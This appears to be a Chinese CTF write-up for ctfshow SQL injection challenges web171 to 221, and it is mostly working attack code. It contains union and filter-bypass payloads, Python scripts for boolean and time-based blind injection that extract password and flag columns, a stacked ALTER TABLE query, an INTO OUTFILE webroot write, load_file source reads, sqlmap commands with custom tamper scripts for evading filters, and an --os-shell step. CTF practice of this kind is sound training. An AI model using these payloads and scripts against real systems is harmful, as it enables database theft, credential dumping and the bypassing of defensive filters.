web171

判断是否注入

使用注释符–+ +代表的是空格或者使用%23来做注释符 1' and 1=1%23

order by 判断列数

order by 是根据某一列进行排序使用 1' order by 3--+ 返回正常

1' order by 4--+ 没有数据说明列数是3

使用union select 判断回显

file

回显位置在1,2,3

查询数据库

1' union select 1,2,database()--+ 库名：ctfshow_web

查列名

1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user' --+ file

查表中的数据

1'union select id,username,password from ctfshow_user --+ 拿到flag

web172

flag在另一张表 ctfshow_web2 只有两列 file

-1' union select to_base64(username),hex(password) from ctfshow_user2 --+ 将输出编码绕过过滤然后进行解码得到flag

web173

三列回显编码输出 1' union select id,hex(username),hex(password) from ctfshow_user3--+

web174

过滤了flag和数字有两列 payload 1' union select REPLACE(username,'g','j'),REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(password,'1','A'),'2','B'),'3','C'),'4','D'),'5','E'),'6','F'),'7','G'),'8','H'),'9','I'),'0','J'),'g','j') from ctfshow_user4 where username='flag' limit 1,1 --+ 然后将对应的替换掉就可以

可以使用盲注

大佬脚本

# @Author:Y4tacker
import requests

url = "http://e076200d-5e74-4121-b2fc-04153243f7a3.chall.ctf.show/api/v4.php?id=1' and "

result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        payload = f'1=if(ascii(substr((select  password from ctfshow_user4 limit 24,1),{i},1))>{mid},1,0) -- -'
        r = requests.get(url + payload)
        if "admin" in r.text:
            head = mid + 1
        else:
            tail = mid

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

file file

web175

啥都没显示

有时间注入 payload 1' and if(1=1,sleep(3),1)--+ 写脚本

import requests
url="http://be3b1c4d-62d4-4ec4-8ca4-ca893b90126c.challenge.ctf.show:8080/api/v5.php?id=1' and "
flag=''
ind=0
while True:
    ind+=1
    head=32
    tail=127
    while head<tail:
        mid=(head+tail) >> 1
        payload=f'if(ascii(substr((select  password from ctfshow_user5 limit 24,1),{ind},1))>{mid},sleep(1),0) -- '
        try:
            r=requests.get(url+payload, timeout=0.5)
            tail=mid
        except:
            head=mid+1

    if head != 32:
        flag+=chr(head)
    else:
        break
    print(flag)

然后还可以将查询结果写文件写到网站根目录 payload 1' union select 1,password from ctfshow_user5 into outfile '/var/www/html/1.txt'--+

web176

常规测试字段为3 大小写绕过union select

1' uNion sElect 1,2,password from ctfshow_user --+ 或者使用万能密码

web177

过滤了空格使用/**/绕过

注释符用%23

1'/**/union/**/select/**/password,1,1/**/from/**/ctfshow_user/**/where/**/username/**/='flag'%23

web178

过滤了空格和* 用%09代替空格 1'%09order%09by%092%23 1'%09union%09select%091,2,password%09from%09ctfshow_user%23

web179

过滤空格%09也过滤了

id=1'or'1'='1'%23 使用单引号不用空格（或者用括号）

或者用%0c绕过空格 1'union%0cselect%0c1,2,password%0cfrom%0cctfshow_user%23

web180

-1'or(id=26)and'a'='a

web181

可以代替空格的 file 被过滤同上payload

web182

同上

web183

在表名和数据库名那可以使用反引号就不需要空格 file 写脚本可以使用正则一位一位判断

import requests
url = "http://17a4723c-db41-4360-afd9-405682abe24c.challenge.ctf.show:8080/select-waf.php"
flagstr="flag{0123456789-qwertyuiopkjhdszxcvbnm}"
flag=""
for i in range(5,50):
    for s in flagstr:
        data={
            "tableName":f"`ctfshow_user`where(substr(`pass`,{i},1)regexp('{s}'))"
        }
        re=requests.post(url, data)
        if(re.text.find("$user_count = 1;")>0):
            flag+=s
            print(flag)
            break

另一个脚本

import requests
url = "http://17a4723c-db41-4360-afd9-405682abe24c.challenge.ctf.show:8080/select-waf.php"
flagstr="flag{0123456789-qwertyuiopkjhdszxcvbnm}"
flag="ctfshow{"
for i in range(50):
    for s in flagstr:
        data={
            "tableName":"(ctfshow_user)where(pass)like'{}%'".format(flag+s)
        }
        re=requests.post(url, data)
        if(re.text.find("$user_count = 1;")>0):
            flag+=s
            print(flag)
            break

web184

没有过滤空格利用group by分组 having盲注过滤了单引号使用十六进制绕过

import requests
def str_to_hex(st):
    return ''.join(hex(ord(s)).replace('0x', '') for s in st)

url="http://1d6e11cd-487e-4750-8231-03abbc9e1a70.challenge.ctf.show:8080/select-waf.php"
flagstr="flag{0123456789-qwertyuiopkjhdszxcvbnm}"
flag="ctfshow{"
for i in range(50):
    for s in flagstr:
        data={
            "tableName":"ctfshow_user group by pass having pass  like {}".format("0x"+str_to_hex(flag+s+'%'))
        }
        re=requests.post(url, data)
        if(re.text.find("$user_count = 1;")>0):
            flag+=s
            print(flag)
            break

web185

数字被禁用 file

import requests

def createNum(n):
    num = 'true'
    if n == 1:
        return 'true'
    else:
        for i in range(n - 1):
            num += "+true"
    return num

def createStrNum(s):
    str=""
    str+="chr("+createNum(ord(s[0]))+")"
    for i in s[1:]:
        str+=",chr("+createNum(ord(i))+")"
    return str

url="http://f183a7ad-294c-474f-8c9a-8d535ee63fed.challenge.ctf.show:8080/select-waf.php"

flag="ctfshow{"
for i in range(0,100):
    for j in "0123456789abcdefghijklmnopqrstuvwxyz-{}":
        data={
            'tableName':"ctfshow_user group by pass having pass like(concat({}))".format(createStrNum(flag+j+"%"))
        }
        r=requests.post(url=url,data=data).text
        if "$user_count = 0;" not in r:
            flag+=j
            print(flag)
            if j=='}':
                exit()
            break

web186

同上

web187

使用用户名：admin 密码为：ffifdyop

ffifdyop的MD5(st,true)的值为 ’or’6�]��!r,��b

mysql中 file 只要or后边单引号包住的字符串第一个是数字就会把后边当成true 所以就可有登录

web188

账号密码都为0

file

当user都为字符串但是 where中的user为整数时会将每个user前加上个0 再进行比较所以结果就是所以数据都显示出来

然后得出来的账号前边有个0 密码也是0 弱比较之后就登录成功

web189

file

根据用户名为0和1的返回不同进行盲注

import requests

url="http://149a11b0-c5bc-47b1-9a19-e4b7a0c897ee.challenge.ctf.show:8080//api/index.php"

flag="ctfshow{"
for i in range(0,100):
    for j in "0123456789abcdefghijklmnopqrstuvwxyz-{}":
        payload="if((load_file('/var/www/html/api/index.php'))regexp('{}'),0,1)".format(flag+j)
        data={
            'username':payload,
            'password':1
        }
        r=requests.post(url=url,data=data)
        if "\\u5bc6\\u7801\\u9519\\u8bef" in r.text:
            flag+=j
            print(flag)
            if j=='}':
                exit()
            break

web190

盲注

1’ or 1=1# 返回密码错误 1’ or 1=2# 返回账号不存在

import requests
url="http://488af20f-7098-4dce-adb9-cf7e7d2ccfd9.challenge.ctf.show:8080/api/"
flag=''
i=0
while True:
    i+=1
    head=32
    tail=127
    while head<tail:
        mid=(head+tail)>>1
        #查表名 ctfshow_fl0g,ctfshow_user
        #payload="select group_concat(table_name) from information_schema.tables where table_schema=database()"
        #查字段 id,f1ag
        #payload="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
        payload="select group_concat(f1ag) from ctfshow_fl0g"

        data={
            "username":f"1' or if(ascii(substr(({payload}),{i},1))>{mid},1,2)=1#",
            "password":"1"
        }
        rep=requests.post(url,data)

        if "密码错误" in rep.json()['msg']:
            head=mid+1
        else:
            tail=mid

    if head!=32:
        flag+=chr(head)
        print(flag)
    else:
        break

web191

ban了ascii 可以换成ord

import requests
url="http://4ecbdd5c-db9b-427a-98d8-74e3aafeb767.challenge.ctf.show:8080/api/"
flag=''
i=0
while True:
    i+=1
    head=32
    tail=127
    while head<tail:
        mid=(head+tail)>>1
        #查表名 ctfshow_fl0g,ctfshow_user
        #payload="select group_concat(table_name) from information_schema.tables where table_schema=database()"
        #查字段 id,f1ag
        #payload="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
        payload="select group_concat(f1ag) from ctfshow_fl0g"

        data={
            "username":f"1' or if(ord(substr(({payload}),{i},1))>{mid},1,2)=1#",
            "password":"1"
        }
        rep=requests.post(url,data)

        if "密码错误" in rep.json()['msg']:
            head=mid+1
        else:
            tail=mid

    if head!=32:
        flag+=chr(head)
        print(flag)
    else:
        break

也可以不用ord

"username":f"1' or if(substr(({payload}),{i},1)>chr({mid}),1,2)=1#",
"password":"1"

web192

和上一题的第二种方法一样

import requests
url="http://18e6f404-51c7-4220-b39b-2e52ecc73fd2.challenge.ctf.show:8080/api/"
flag=''
i=0
while True:
    i+=1
    head=32
    tail=127
    while head<tail:
        mid=(head+tail)>>1
        #查表名 ctfshow_fl0g,ctfshow_user
        #payload="select group_concat(table_name) from information_schema.tables where table_schema=database()"
        #查字段 id,f1ag
        #payload="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
        payload="select group_concat(f1ag) from ctfshow_fl0g"

        data={
            "username":f"1' or if(substr(({payload}),{i},1)>chr({mid}),1,2)=1#",
            "password":"1"
        }
        rep=requests.post(url,data)

        if "密码错误" in rep.json()['msg']:
            head=mid+1
        else:
            tail=mid

    if head!=32:
        flag+=chr(head)
        print(flag.lower())
    else:
        break

web193

过滤了substr 使用like 或者regexp绕过

import requests
url="http://ad7d04ca-9287-401d-a74a-0276008372e4.challenge.ctf.show:8080/api/"
flag=''
flagstr='0123456789-{},qwertyuioplkjhgfdsazxcvbnm_'
i=0
while True:
    #查表名 ctfshow_flxg,ctfshow_user
    #payload="select group_concat(table_name) from information_schema.tables where table_schema=database()"
    #查字段 id,f1ag
    #payload="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg'"
    payload = "select group_concat(f1ag) from ctfshow_flxg"
    for i in flagstr:
        data={
            "username":f"1' or if(({payload}) like '{flag+i}%',1,2)=1#",
            "password":1
        }
        rep=requests.post(url,data)
        # print(rep.json())
        # print(data)
        if "密码错误" in  rep.json()['msg']:
            flag+=i
            print(flag)
            break

web194

同上脚本也可以使用locate()函数 file

import requests
url="http://e10ba9ba-e60c-4c7e-8f92-9293534c7e85.challenge.ctf.show:8080/api/"
flag=''
flagstr='ctf0123456789-{},qweryuioplkjhgdsazxvbnm_'
i=0
while True:
    #查表名 ctfshow_flxg,ctfshow_user
    #payload="select group_concat(table_name) from information_schema.tables where table_schema=database()"
    #查字段 id,f1ag
    #payload="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg'"
    payload = "select group_concat(f1ag) from ctfshow_flxg"
    for i in flagstr:
        data={
            "username":f"1' or if(locate('{flag+i}',({payload}))>0,1,2)=1#",
            "password":1
        }
        rep=requests.post(url,data)
        # print(rep.json())
        # print(data)
        if "密码错误" in  rep.json()['msg']:
            flag+=i
            print(flag)
            break

不过要主要前边的flagstr中要把ctf 三个字符放在前边

web195

payload=”0;updatectfshow_usersetpass=1” 然后使用用户名为0或者0x61646d696e 密码为1 登录 0的原因是同之前的原理用十六进制是因为题目的sql语句查询的用户名并没有用单引号包围

web196

1;select(1) 1

web197

将pass列更改为autumn 将id列更改为pass列 1;alter table ctfshow_user change pass autumn varchar(255); alter table ctfshow_user change id passvarchar(255) 然后使用0或0x61646d696e作为用户名密码用burp从1开始爆破

web198

同上

web199

1;show tables; ctfshow_user

web200

同上

web201

学习使用sqlmap 爆库 python sqlmap.py -u http://28444a72-82d6-495c-b544-732abef317ff.challenge.ctf.show:8080/api/?id=1* --dbs --user-agent sqlmap --referer http://28444a72-82d6-495c-b544-732abef317ff.challenge.ctf.show:8080/sqlmap.php

爆表 python sqlmap.py -u http://28444a72-82d6-495c-b544-732abef317ff.challenge.ctf.show:8080/api/?id=1* --user-agent sqlmap --referer http://28444a72-82d6-495c-b544-732abef317ff.challenge.ctf.show:8080/sqlmap.php -D "ctfshow_web" --tables

爆列名 python sqlmap.py -u http://28444a72-82d6-495c-b544-732abef317ff.challenge.ctf.show:8080/api/?id=1* --user-agent sqlmap --referer http://28444a72-82d6-495c-b544-732abef317ff.challenge.ctf.show:8080/sqlmap.php -D "ctfshow_web" -T "ctfshow_user" --columns

爆字段 python sqlmap.py -u http://28444a72-82d6-495c-b544-732abef317ff.challenge.ctf.show:8080/api/?id=1* --user-agent sqlmap --referer http://28444a72-82d6-495c-b544-732abef317ff.challenge.ctf.show:8080/sqlmap.php -D "ctfshow_web" -T "ctfshow_user" --columns -C pass --dump

web202

python sqlmap.py -u http://33f5109e-d2a0-438f-abe4-39ed492b4270.challenge.ctf.show:8080/api/ --data="id=1" --referer="ctf.show" -D "ctfshow_web" -T "ctfshow_user" --columns -C pass --dump 使用data改post请求

web203

--method=PUT 需要加上-headers=”content-type:text/plain”

python sqlmap.py -u "http://836dec64-499b-4a0b-80ca-27a056c5f2bf.challenge.ctf.show:8080/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" -D "ctfshow_web" -T "ctfshow_user" --columns -C pass --dump

web204

添加cookie python sqlmap.py -u "http://406f79f4-9974-4ad0-b345-d518d8f582a6.challenge.ctf.show:8080/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --cookie="PHPSESSID=0r1o7m11nbljtm95t6holosfsi; ctfshow=fb18d052f4477293bd3580f0f20ede7d" -D "ctfshow_web" -T "ctfshow_user" --columns -C pass --dump

web205

在访问api前需要先访问一个gettoken file 需要两个参数

--safe-url 设置在测试目标地址前访问的安全链接
--safe-freq 设置每测试多少条注入语句后才去访问safe-url

python sqlmap.py -u "http://e60d8c4c-cd7e-40cb-8904-b323fec20ec9.challenge.ctf.show:8080/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" -D "ctfshow_web" -T "ctfshow_user" --columns -C pass --dump --safe-url="http://e60d8c4c-cd7e-40cb-8904-b323fec20ec9.challenge.ctf.show:8080/api/getToken.php" --safe-freq=1

web206

同上 python sqlmap.py -u "http://d48a0400-0058-492b-8396-8080a076d2c2.challenge.ctf.show:8080/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" -D "ctfshow_web" -T "ctfshow_user" --columns -C pass --dump --safe-url="http://d48a0400-0058-492b-8396-8080a076d2c2.challenge.ctf.show:8080/api/getToken.php" --safe-freq=1

web207

--tamper 的初体验

space2comment.py用/**/代替空格

apostrophemask.py用utf8代替引号

equaltolike.pylike代替等号

space2dash.py　绕过过滤‘=’ 替换空格字符（”），（’–‘）后跟一个破折号注释，一个随机字符串和一个新行（’n’）

greatest.py　绕过过滤’>’ ,用GREATEST替换大于号。

space2hash.py空格替换为#号,随机字符串以及换行符

apostrophenullencode.py绕过过滤双引号，替换字符和双引号。

halfversionedmorekeywords.py当数据库为mysql时绕过防火墙，每个关键字之前添加mysql版本评论

space2morehash.py空格替换为 #号 以及更多随机字符串 换行符

appendnullbyte.py在有效负荷结束位置加载零字节字符编码

ifnull2ifisnull.py　绕过对IFNULL过滤,替换类似’IFNULL(A,B)’为’IF(ISNULL(A), B, A)’

space2mssqlblank.py(mssql)空格替换为其它空符号

base64encode.py　用base64编码替换

space2mssqlhash.py　替换空格

modsecurityversioned.py过滤空格，包含完整的查询版本注释

space2mysqlblank.py　空格替换其它空白符号(mysql)

between.py用between替换大于号（>）

space2mysqldash.py替换空格字符（”）（’ – ‘）后跟一个破折号注释一个新行（’ n’）

multiplespaces.py围绕SQL关键字添加多个空格

space2plus.py用+替换空格

bluecoat.py代替空格字符后与一个有效的随机空白字符的SQL语句,然后替换=为like

nonrecursivereplacement.py双重查询语句,取代SQL关键字

space2randomblank.py代替空格字符（“”）从一个随机的空白字符可选字符的有效集

sp_password.py追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾

chardoubleencode.py双url编码(不处理以编码的)

unionalltounion.py替换UNION ALLSELECT UNION SELECT

charencode.py　url编码

randomcase.py随机大小写

unmagicquotes.py宽字符绕过 GPCaddslashes

randomcomments.py用/**/分割sql关键字

charunicodeencode.py字符串 unicode 编码

securesphere.py追加特制的字符串

versionedmorekeywords.py注释绕过

space2comment.py替换空格字符串(‘‘) 使用注释‘/**/’

halfversionedmorekeywords.py关键字前加注释

编写tamper脚本

#!/usr/bin/env python

"""
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    retVal=""
    for i in range(len(payload)):
        if payload[i]==" ":
            retVal+="/**/"
        else:
            retVal+=payload[i]
    return retVal

然后放到sqlmap\tamper这个目录下添加–tamper=ctfshowweb207参数指定脚本

python sqlmap.py -u http://d9774d58-9260-4693-861a-a028a947cb5a.challenge.ctf.show:8080/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql --dbs --headers="Content-Type: text/plain" --safe-url=http://d9774d58-9260-4693-861a-a028a947cb5a.challenge.ctf.show:8080/api/getToken.php --safe-freq=1 --tamper=ctfshowweb207 使用代理到burp查看下payload

file

然后常规爆字段

web208

过滤了select和空格 select用大小写绕过

#!/usr/bin/env python

"""
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    retVal=""
    for i in range(len(payload)):
        if payload[i]==" ":
            retVal+="/**/"
        else:
            retVal+=payload[i]
    retVal=retVal.replace("select","SelEct")
    return retVal

python sqlmap.py -u http://6737dc68-9bb8-44ef-84ec-e75b9130d6ef.challenge.ctf.show:8080/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql --dbs  --headers="Content-Type: text/plain" --safe-url=http://6737dc68-9bb8-44ef-84ec-e75b9130d6ef.challenge.ctf.show:8080/api/getToken.php --safe-freq=1 --tamper=ctfshowweb207

python sqlmap.py -u http://6737dc68-9bb8-44ef-84ec-e75b9130d6ef.challenge.ctf.show:8080/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql -D ctfshow_web -T ctfshow_flaxcac  --headers="Content-Type: text/plain" --safe-url=http://6737dc68-9bb8-44ef-84ec-e75b9130d6ef.challenge.ctf.show:8080/api/getToken.php --safe-freq=1 --tamper=ctfshow208_tamper --columns -C flagvca --dump

web209

过滤了= 空格 * 空格用%0a代替 =用like代替

#!/usr/bin/env python

"""
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    retVal=""
    for i in range(len(payload)):
        if payload[i]==" ":
            retVal+=chr(0x0a)
        elif payload[i]=="=":
            retVal+=chr(0x0a)+'like'+chr(0x0a)
        else:
            retVal+=payload[i]
    retVal=retVal.replace("select","SelEct")
    return retVal

python sqlmap.py -u http://0a522aa3-13c7-4e43-8f50-fa0527795aed.challenge.ctf.show:8080/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql --headers="Content-Type: text/plain" --safe-url=http://0a522aa3-13c7-4e43-8f50-fa0527795aed.challenge.ctf.show:8080/api/getToken.php --safe-freq=1 --tamper=ctfshow209_tamper -D ctfshow_web -T ctfshow_flav --columns  -C ctfshow_flagx --dump

web210

进行编码

#!/usr/bin/env python

"""
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY
import base64

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):

    retVal = payload

    if payload:
        retVal=retVal.encode()
        retVal=retVal[::-1]
        retVal=base64.b64encode(retVal)
        retVal=retVal[::-1]
        retVal=base64.b64encode(retVal)
    return retVal.decode()

str.encode() 是将字符串边为字节 file

python sqlmap.py -u http://b9d282da-1233-46c9-a2e9-15c0b6ed2b3e.challenge.ctf.show:8080/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql --headers="Content-Type: text/plain" --safe-url=http://b9d282da-1233-46c9-a2e9-15c0b6ed2b3e.challenge.ctf.show:8080/api/getToken.php --safe-freq=1 --tamper=ctfshow210_tamper --dbs

web211

在上一题的情况下又添加了空格过滤

#!/usr/bin/env python

"""
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY
import base64

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    payload=pass_waf(payload)
    retVal = payload
    retVal = retVal.encode()
    retVal = retVal[::-1]
    retVal = base64.b64encode(retVal)
    retVal = retVal[::-1]
    retVal = base64.b64encode(retVal)
    return retVal.decode()

def pass_waf(payload):
    retVal=''
    for i in range(len(payload)):
        if payload[i]==" ":
            retVal+=chr(0x0a)
        else:
            retVal+=payload[i]
    return retVal

python sqlmap.py -u http://ff562c8d-d1ae-4d94-bbc8-07d2a04ea52c.challenge.ctf.show:8080/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql --headers="Content-Type: text/plain" --safe-url=http://ff562c8d-d1ae-4d94-bbc8-07d2a04ea52c.challenge.ctf.show:8080/api/getToken.php --safe-freq=1 --tamper=ctfshow211_tamper --dbs

web212

增加了*号过滤同上

python sqlmap.py -u http://f985196c-f4f4-43f8-8898-346205e223ff.challenge.ctf.show:8080/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql --headers="Content-Type: text/plain" --safe-url=http://f985196c-f4f4-43f8-8898-346205e223ff.challenge.ctf.show:8080/api/getToken.php --safe-freq=1 --tamper=ctfshow211_tamper --dbs

web213

使用–os-shell

web214

时间盲注注入点是api/index.php的POST参数ip

import requests
from time import time
url="http://0c216321-dea8-4208-882e-ac20fc4dc4b5.challenge.ctf.show:8080/api/index.php"
flag=''
i=0
while True:
    i+=1
    head=32
    tail=127
    while head<tail:
        mid=(head+tail)>>1
        #查表ctfshow_flagx,ctfshow_info
        #payload="select group_concat(table_name) from information_schema.tables where table_schema=database()"
        #查字段id,flaga,info
        #payload="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'"
        payload="select flaga from ctfshow_flagx"
        data={
            'ip':f'if(ascii(substr(({payload}),{i},1))>{mid},sleep(2),1)',
            'debug':0
        }
        try:
            r=requests.post(url,data,timeout=1)
            tail=mid
        except:
            head=mid+1
    if head!=32:
        flag+=chr(head)
        print(flag)
    else:
        break

web215

用了单引号

import requests
from time import time
url="http://33e24783-c02f-434c-bdc5-941131a9d9d9.challenge.ctf.show:8080/api/index.php"
flag=''
i=0
while True:
    i+=1
    head=32
    tail=127
    while head<tail:
        mid=(head+tail)>>1
        #查表
        payload="select group_concat(table_name) from information_schema.tables where table_schema=database()"
        #查字段
        #payload="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'"
        #payload="select flaga from ctfshow_flagx"
        data={
            'ip':f"' or if(ascii(substr(({payload}),{i},1))>{mid},sleep(2),1)#",
            'debug':0
        }
        try:
            r=requests.post(url,data,timeout=1)
            tail=mid
        except:
            head=mid+1
    if head!=32:
        flag+=chr(head)
        print(flag)
    else:
        break

web216

emm..不太懂这个from_base64 在mysql里边试了下出错了参照大佬的wp需要把前边from_base64给闭合掉

import requests
from time import time
url="http://f2f212e7-fc41-4cc7-a276-4b9b07d5beac.challenge.ctf.show:8080/api/index.php"
flag=''
i=0
while True:
    i+=1
    head=32
    tail=127
    while head<tail:
        mid=(head+tail)>>1
        #查表
        payload="select group_concat(table_name) from information_schema.tables where table_schema=database()"
        #查字段
        #payload="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'"
        #payload="select flaga from ctfshow_flagx"
        data={
            'ip':f"'MQ==') or if(ascii(substr(({payload}),{i},1))>{mid},sleep(2),1)#",
            'debug':0
        }
        try:
            r=requests.post(url,data,timeout=1)
            tail=mid
        except:
            head=mid+1
    if head!=32:
        flag+=chr(head)
        print(flag)
    else:
        break

web217

sleep被ban 使用benchmark 五种时间盲注姿势

"""
Author:feng
"""
import requests
import time
url='http://9b2a89ce-8e84-471c-9b2e-be262825623d.chall.ctf.show:8080/api/index.php'

flag=''
for i in range(1,100):
    min=32
    max=128
    while 1:
        j=min+(max-min)//2
        if min==j:
            flag+=chr(j)
            print(flag)
            if chr(j)=='}':
                exit()
            break

        #payload="if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))<{},benchmark(1000000,md5(1)),1)".format(i,j)
        #payload="if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxccb'),{},1))<{},benchmark(1000000,md5(1)),1)".format(i,j)
        payload="if(ascii(substr((select group_concat(flagaabc) from ctfshow_flagxccb),{},1))<{},benchmark(1000000,md5(1)),1)".format(i,j)

        data={
            'ip':payload,
            'debug':0
        }
        try:
            r=requests.post(url=url,data=data,timeout=0.5)
            min=j
        except:
            max=j
        time.sleep(0.2)
    time.sleep(1)

web218

使用笛卡尔积盲注或者正则DOS RLIKE注入链接

笛卡尔积可能是请求过于频繁加了几个sleep才能注入出来但是还是容易出错

import requests
import time
url="http://8b738514-d058-4236-be51-b6e044a1f760.challenge.ctf.show:8080/api/index.php"
flag=''
i=0
tim="SELECT count(*) FROM information_schema.tables A, information_schema.schemata B, information_schema.schemata D, information_schema.schemata E, information_schema.schemata F,information_schema.schemata G, information_schema.schemata H,information_schema.schemata I"
while True:
    i+=1
    head=32
    tail=127
    while head<tail:

        mid=(head+tail)>>1
        if mid==121:
            time.sleep(2)
        #查表
        payload="select group_concat(table_name) from information_schema.tables where table_schema=database()"
        #查字段
        #payload="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'"
        #payload="select flaga from ctfshow_flagx"

        data={
            'ip':f"if(ascii(substr(({payload}),{i},1))>{mid},({tim}),1)",
            'debug':0
        }
        try:
            print(data)
            r=requests.post(url,data,timeout=2)
            tail=mid
        except:
            head=mid+1
    if head!=32:
        flag+=chr(head)
        print(flag)
        time.sleep(5)
    else:
        break

RLIKE 也是容易出问题

import requests
import time
url="http://8b738514-d058-4236-be51-b6e044a1f760.challenge.ctf.show:8080/api/index.php"
flag=''
i=0
#tim="SELECT count(*) FROM information_schema.tables A, information_schema.schemata B, information_schema.schemata D, information_schema.schemata E, information_schema.schemata F,information_schema.schemata G, information_schema.schemata H,information_schema.schemata I"
tim="concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) rlike '(a.*)+(a.*)+b'"
while True:
    i+=1
    head=32
    tail=127
    while head<tail:

        mid=(head+tail)>>1
        # if mid==121:
        #     time.sleep(2)
        #查表
        payload="select group_concat(table_name) from information_schema.tables where table_schema=database()"
        #查字段
        #payload="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'"
        #payload="select flaga from ctfshow_flagx"

        data={
            'ip':f"if(ascii(substr(({payload}),{i},1))>{mid},({tim}),1)",
            'debug':0
        }
        try:
            print(data)
            r=requests.post(url,data,timeout=0.3)
            tail=mid
        except:
            head=mid+1
    if head!=32:
        flag+=chr(head)
        print(flag)
        # time.sleep(5)
    else:
        break

web219

同上

web220

function waf($str){
        return preg_match('/sleepbenchmarkrlikeasciihexconcat_wsconcatmidsubstr/i',$str);
    }

前边的用like或者left 时间盲注用笛卡尔积

import requests
import time
url="http://daf5aa33-1f9a-4e09-a5d8-79b5e452b5b0.challenge.ctf.show:8080/api/index.php"
flag=''
i=0
tim="SELECT count(*) FROM information_schema.tables A, information_schema.schemata B, information_schema.schemata D, information_schema.schemata E, information_schema.schemata F,information_schema.schemata G, information_schema.schemata H,information_schema.schemata I"
#tim="concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) rlike '(a.*)+(a.*)+b'"
flagstr="ctf{}qwertyuiopasdghjklzxvbnm-_"
while True:
    i+=1
    for j in flagstr:
        payload="select group_concat(table_name) from information_schema.tables where table_schema=database()"
        #查字段
        #payload="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'"
        #payload="select flaga from ctfshow_flagx"

        data={
            'ip':"if((select flagaabcc from ctfshow_flagxcac limit 0,1) like '{}',(SELECT count(*) FROM information_schema.columns A, information_schema.columns B),1)".format(flag+j+"%"),
            'debug':0
        }
        try:
            print(data)
            r=requests.post(url,data,timeout=0.3)
        except:
            flag+=j
            print(flag)
            if j=='}':
                break
        time.sleep(0.3)

这个比较稳

import requests
import time
url="http://daf5aa33-1f9a-4e09-a5d8-79b5e452b5b0.challenge.ctf.show:8080/api/index.php"

strr = "_1234567890{}-qazwsxedcrfvtgbyhnujmikolp"
payload = "select table_name from information_schema.tables where table_schema=database() limit 0,1"
# payload = "select column_name from information_schema.columns where table_name='ctfshow_flagxcac' limit 1,1"
#payload = "select flagaabcc from ctfshow_flagxcac"
j = 1
res = ""
while 1:
    for i in strr:
        res += i
        data = {
            'ip': f"1) or if(left(({payload}),{j})='{res}',(SELECT count(*) FROM information_schema.tables A, information_schema.schemata B, information_schema.schemata D, information_schema.schemata E, information_schema.schemata F,information_schema.schemata G, information_schema.schemata H,information_schema.schemata I),1",
            'debug': '1'
        }
        # print(i)
        try:
            r = requests.post(url, data=data, timeout=3)
            res = res[:-1]
        except Exception as e:
            print(res)
            j+=1

web221

file

参考

